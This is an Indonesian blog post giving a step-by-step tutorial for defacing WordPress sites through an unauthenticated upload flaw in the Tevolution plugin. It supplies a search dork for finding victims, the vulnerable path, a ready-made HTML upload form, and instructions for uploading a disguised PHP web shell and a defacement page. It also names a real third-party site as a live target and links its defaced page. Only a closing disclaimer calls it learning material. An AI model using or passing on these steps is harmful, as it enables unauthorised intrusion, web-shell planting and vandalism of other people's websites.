Deface Metode Tevolution Plugin Vulnerability


Deface Metode Tevolution Plugin Vulnerability

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Metode Tevolution Plugin Vulnerability

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini


Disini saya akan menulis artikel yang berjudul "Deface Metode Tevolution Plugin Vulnerability" Langsung saja ke tutorialnya..

Bahan Bahan :

1. Dork: inurl:"/plugins/Tevolution/" (kembangi lagii)

2. Exploit: /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. CSRF (save dengan format .html ):
<form action = "http://site.target/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method = "post" enctype = "multipart / form-data"> <label for = "file"> Filename: </ label> <input type = "file" name = "Filedata"> reviews <input type = "submit" name = "submit" value = "3xploi7ed!"> </ form >

4. Shell: format .php.xxxjpg => Download (Punya IndoXploit)
    contoh: Shell.php.xxxjpg 

5. Script deface : Download

Step by Step :

1. Dorking Dulu

2. Pilih salah satu Web
    Live Target: http://www.hebergement.rayssaguel.com/

3. Masukkan Exploitnya 
    contoh : http://www.hebergement.rayssaguel.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

Vuln ?! "Blank" (Putih semua)

4. Buat CSRF nya tadi => Masukkan Target => Save dengan format .html

5. Buka CSRF => Upload Shell / Script deface

Kalau Gagal ada Tulisan [Error]

Akses Shell?!
www.site.com/wp-content/uploads/[tahun]/[bulan]/nameshell

Akses Script Deface?!

www.site.com/wp-content/uploads/[tahun]/[bulan]/namascript.html

Live Target Tadii http://www.hebergement.rayssaguel.com/wp-content/uploads/2017/03/index.html

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Metode Tevolution Plugin Vulnerability" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Deface Metode Tevolution Plugin Vulnerability" Dengan URL https://ryangueltoem.blogspot.co.id/2017/03/deface-metode-tevolution-plugin.html
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

0 Response to "Deface Metode Tevolution Plugin Vulnerability"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel